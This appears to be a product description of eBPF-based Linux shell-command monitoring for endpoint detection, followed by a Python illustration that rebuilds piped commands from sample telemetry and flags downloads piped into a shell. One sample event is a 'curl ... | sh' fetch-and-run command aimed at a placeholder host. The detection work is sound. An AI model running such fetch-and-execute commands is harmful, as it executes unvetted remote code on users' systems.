Endpoint Detection and Response (EDR)
Shell Command Monitoring with eBPF
Product Category
Objective
Capture detailed telemetry for shell commands executed on Linux systems, including internal (built-in) commands and piped commands that have no associated executable binary, to enhance endpoint detection and response (EDR) capabilities.
Details
Shells Monitored: sh, bash, dash, zsh, and pwsh (PowerShell).
Data Captured:
- Command executed, including arguments
- I/O redirection details
- Connection between piped commands
- User initiating the command and the context in which it was run
Use Case
This implementation improves the ability to detect and respond to potentially malicious activities performed via shell commands, such as unauthorized access, privilege escalation, and lateral movement within the network, by providing comprehensive visibility into all shell activity.
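As an added illustration (not the product's own code or event schema), the following Python takes per-command events carrying the fields listed under Data Captured, rebuilds each pipeline from its pipe links and redirections, and runs one detection over the result; the event field names and sample values are constructed assumptions.

```python
# Constructed telemetry (field names assumed); pipe_from = id of the command whose stdout feeds this one.
EVENTS = [
    {"id": 1, "shell": "bash", "user": "alice", "pipe_from": None,
     "argv": ["curl", "-s", "http://example.invalid/setup.sh"], "redirects": []},
    {"id": 2, "shell": "bash", "user": "alice", "pipe_from": 1,
     "argv": ["sh"], "redirects": [{"fd": 2, "op": ">", "target": "/dev/null"}]},
    {"id": 3, "shell": "zsh", "user": "bob", "pipe_from": None,
     "argv": ["ls", "-la", "/var/log"], "redirects": []},
    {"id": 4, "shell": "zsh", "user": "bob", "pipe_from": 3,
     "argv": ["grep", "auth"], "redirects": [{"fd": 1, "op": ">", "target": "/tmp/auth.txt"}]},
]
DOWNLOADERS = {"curl", "wget"}
SHELLS = {"sh", "bash", "dash", "zsh", "pwsh"}  # the shells the page lists as monitored


def build_pipelines(events):
    """Chain events into pipelines by following the pipe_from links."""
    by_id = {e["id"]: e for e in events}
    next_id = {e["pipe_from"]: e["id"] for e in events if e["pipe_from"] is not None}
    pipelines = []
    for head in (e for e in events if e["pipe_from"] is None):
        chain, cur = [head], head["id"]
        while cur in next_id:  # walk the stdout -> stdin links
            cur = next_id[cur]
            chain.append(by_id[cur])
        pipelines.append(chain)
    return pipelines


def render(chain):
    """Rebuild the command line the user typed, redirections included."""
    stages = []
    for e in chain:
        text = " ".join(e["argv"])
        for r in e["redirects"]:
            # stdout for '>' and stdin for '<' are implicit in shell syntax; other fds are spelled out
            implicit = (r["fd"] == 1 and r["op"][0] == ">") or (r["fd"] == 0 and r["op"] == "<")
            text += " " + ("" if implicit else str(r["fd"])) + r["op"] + r["target"]
        stages.append(text)
    return " | ".join(stages)


def network_feeds_shell(chain):
    """Detection: a downloader piped straight into a shell, so the executed code never exists as a file on disk."""
    names = [e["argv"][0] for e in chain]
    return any(a in DOWNLOADERS and b in SHELLS for a, b in zip(names, names[1:]))


if __name__ == "__main__":
    for chain in build_pipelines(EVENTS):
        tag = "ALERT" if network_feeds_shell(chain) else "info"
        print(f"[{tag}] {chain[0]['user']} ({chain[0]['shell']}): {render(chain)}")
```

Per-process telemetry would show `curl` and `sh` as two unrelated executions; the pipe link is what lets the analyst see them as one command line attributed to one user.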